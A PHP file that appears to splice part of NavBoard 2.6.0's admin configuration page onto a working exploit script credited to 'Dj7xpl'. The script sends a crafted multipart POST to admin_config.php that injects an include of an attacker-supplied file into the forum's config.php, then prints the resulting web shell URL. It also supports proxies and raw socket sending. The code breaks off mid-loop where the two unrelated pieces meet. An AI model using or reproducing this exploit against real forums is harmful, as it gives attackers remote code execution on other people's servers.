"; print ""; print ""; print "Main forum settings"; print ""; print "Board Title"; print ""; print ""; print ""; print "Admin email address (blank will not display)"; print ""; print ""; print ""; print "Main website address (NOT forum address, blank will display forum address)"; print ""; print ""; print ""; print "Display text title instead of graphic logo for faster loading
"; print ""; if($configarray[34]=="on") {print "";} else{print "";} print ""; print "Forums
"; print ""; print "Max levels of subforums to display on one page (less will make for faster loading)
"; print ""; print ""; print ""; print "Don't find forum reply count on the fly, recount during posting
(faster forum page, may slow posting slightly)"; print ""; if($configarray[42]=="on"){ print ""; }else{print "";} print ""; print "Forum/Thread indenting amount
Percentage of title cell used for indent spaing"; print ""; print "%"; print ""; print "Posts
"; print ""; print "Seconds before user may add another post (flood control)"; print ""; print ""; print ""; print "Amount of nested bbcodes allowed
(how many times a bbcode tag can be put over itself) 3 is default"; print ""; print ""; print ""; print "Show names for user levels instead of imageicons:
"; print ""; if($configarray[45]=="on"){ print ""; }else{ print ""; } print ""; print "Show all edits instead of only last edit on posts
"; print ""; if($configarray[46]=="on"){ print ""; }else{ print ""; } print ""; print "Registration
"; print ""; print "Seconds before another account can be registered (flood control)
"; print ""; print ""; print ""; print "Method of registration
"; print "NOTE: Mailing in php must be setup correctly on your server to work with email confirmation"; print ""; if($configarray[39]=="on"||$configarray[39]==""){ print " "; }else{ print " "; } print "Allowed
"; if($configarray[39]=="confirm"){ print " "; }else{ print " "; } print "Email confirmed
"; if($configarray[39]=="approve"){ print " "; }else{ print " "; } print "Admin approved"; print ""; print "Profiles"; print ""; print "Allow duplicate display names
"; print ""; if($configarray[32]=="on"){ print ""; }else{ print ""; } print ""; print "Display name changing
"; print ""; if($configarray[41]=="off"){ print " "; }else{ print " "; } print "Not allowed
"; if($configarray[41]=="on"||$configarray[41]==""){ print " "; }else{ print " "; } print "Allowed
"; if($configarray[41]=="approve"){ print " "; }else{ print " "; } print "Admin approved"; print ""; print "Default time format (php date format) "; print "Recommended: n-j-Y h:iA
"; print ""; print ""; print ""; print "Max people on individual users buddy lists"; print ""; print ""; print ""; print "Avatars
"; print ""; print "Avatar file size limit (bytes)
"; print ""; print "
"; print ""; print "Avatar dimensions limit (height)x(width)
"; print ""; print "
"; print ""; print "Attachments"; print ""; print "Allowed attachment extensions (separated by commas) (blank would allow no attachments)
"; print ""; print ""; print ""; print "Max size of attachments (in bytes)
"; print ""; print ""; print ""; print "Max total size of all attachments (in bytes)
"; print ""; print ""; print ""; print "Polls"; print ""; print "Max poll options
"; print ""; print ""; print ""; print "Theme
"; print ""; print "Default theme
"; print ""; $themesarray=listdirs("themes"); print "\n"; for($n=0;$n$themesarray[$n]"; }else{ print "$themesarray[$n]"; } } print ""; print ""; print "Online users
"; print ""; print "Seconds of inactivity before user is removed from online list (300seconds=5minutes)
"; print ""; print ""; print ""; print "Page settings"; print ""; print "Threads to show per page in forum
"; print ""; print "
"; print ""; print "Posts to show per page in thread
"; print ""; print "
"; print ""; print "Max character settings
"; print ""; print "Max total characters in body of posts
"; print ""; print "
"; print ""; print "Max total characters in subject of posts
"; print ""; print "
"; print ""; print "Max total characters in signatures
"; print ""; print "
"; print ""; print "Enabling/Disabling"; print ""; print "Allow HTML in posts:
"; print ""; if($configarray[14]=="allowhtml"){ print ""; }else{ print ""; } print ""; print "Enable GZ Compression:
"; print ""; if($configarray[21]=="disablegz"){ print ""; }else{ print ""; } print ""; print "Private Messaging
"; print ""; print "Max total size of pms per user (bytes)
"; print ""; print "
"; print ""; print "Max total number of pms per user
"; print ""; print "
"; print ""; print "Board Closing"; print ""; print "Entering info here will cause the entire bulletin board to be closed
"; print "This is the message that shows up when the board is closed
"; print ""; print "
"; print ""; print ""; print ""; print ""; print ""; print ""; print ""; } if($editconfig){ $boardtitle=stripslashes($boardtitle); $boardtitle=htmlentities($boardtitle); writedata("$maindatadir/config.php",$boardtitle,0); writedata("$maindatadir/config.php",$threadperpage,7); writedata("$maindatadir/config.php",$postperpage,8); writedata("$maindatadir/config.php",$avatarfilesize,9); writedata("$maindatadir/config.php",$avatardimension,10); writedata("$maindatadir/config.php",$defaulttheme,12); writedata("$maindatadir/config.php",$inactivityseconds,13); if($html=="on"){ writedata("$maindatadir/config.php","allowhtml",14); }else{ writedata("$maindatadir/config.php","denyhtml",14); } writedata("$maindatadir/config.php",$maxcharsbody,18); writedata("$maindatadir/config.php",$maxcharssigs,19); if($gzcompress=="on"){ writedata("$maindatadir/config.php","enablegz",21); }else{ writedata("$maindatadir/config.php","disablegz",21); } writedata("$maindatadir/config.php",$allowedattachext,22); writedata("$maindatadir/config.php",$maxattachsize,23); writedata("$maindatadir/config.php",$maxpolloptions,24); writedata("$maindatadir/config.php",$maxcharssubject,25); writedata("$maindatadir/config.php",$maxsubforumdisplay,27); writedata("$maindatadir/config.php",$buddylistmax,28); writedata("$maindatadir/config.php",$maxpmsize,29); writedata("$maindatadir/config.php",$maxpmnumber,30); writedata("$maindatadir/config.php",$maxtotalattachsize,31); writedata("$maindatadir/config.php",$allowdupdisplay,32); writedata("$maindatadir/config.php",$defaulttime,33); writedata("$maindatadir/config.php",$textlogo,34); writedata("$maindatadir/config.php",$adminemail,35); writedata("$maindatadir/config.php",$mainwebsite,36); writedata("$maindatadir/config.php",$postfloodcontrolsec,37); writedata("$maindatadir/config.php",$regfloodcontrolsec,38); writedata("$maindatadir/config.php",$registration,39); writedata("$maindatadir/config.php",$boardclosing,40); writedata("$maindatadir/config.php",$displaychange,41); if($configarray[42]!=="on"&&$dontscanreplycount=="on"){//if turning on for first time, make a recount for($n=0;$n 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } $host=$argv[1]; $path=$argv[2]; $port=80; $proxy=""; for ($i=7; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} /*Data*/ $data.='-----------------------------7d6224c08dc Content-Disposition: form-data; name="editconfig" -----------------------------7d6224c08dc Content-Disposition: form-data; name="boardtitle" Dj7xpl -----------------------------7d6224c08dc Content-Disposition: form-data; name="threadperpage" www\";include \"\$shell\";\/\/ -----------------------------7d6224c08dc Content-Disposition: form-data; name="postperpage" Dj7xpl -----------------------------7d6224c08dc Content-Disposition: form-data; name="avatarfilesize" 11 -----------------------------7d6224c08dc Content-Disposition: form-data; name="avatardimension" 123 -----------------------------7d6224c08dc Content-Disposition: form-data; name="defaulttheme" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="inactivityseconds" #CCFF00 -----------------------------7d6224c08dc Content-Disposition: form-data; name="html" on -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxcharsbody" 111 -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxcharssigs" 11122 -----------------------------7d6224c08dc Content-Disposition: form-data; name="gzcompress" on -----------------------------7d6224c08dc Content-Disposition: form-data; name="allowedattachext" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxattachsize" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxpolloptions" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxcharssubject" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxsubforumdisplay" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="buddylistmax" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxpmsize" Dj7xpl -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxpmnumber" Dj7xpl -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxtotalattachsize" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="allowdupdisplay" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="defaulttime" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="textlogo" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="adminemail" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="mainwebsite" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="postfloodcontrolsec" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="regfloodcontrolsec" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="registration" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="boardclosing" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="displaychange" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="replies" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="dontscanreplycount" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="nestedbbcodes" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="indentspacing" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="userlevelnames" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="showalledits" red -----------------------------7d6224c08dc '; /*Echo Header*/ echo "[!] NavBoard 2.6.0\r\n"; echo "[!] Powered By Y! Underground Group\r\n"; echo "[!] Vuln And Coded By Dj7xpl\r\n"; /*Sending Data*/ $packet ="POST ".$path."admin_config.php HTTP/1.0\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacket($packet); sleep(2); Echo "[!] Shell : http://".$host.$path."data/config.php?shell=Evil Text\r\n"; ?>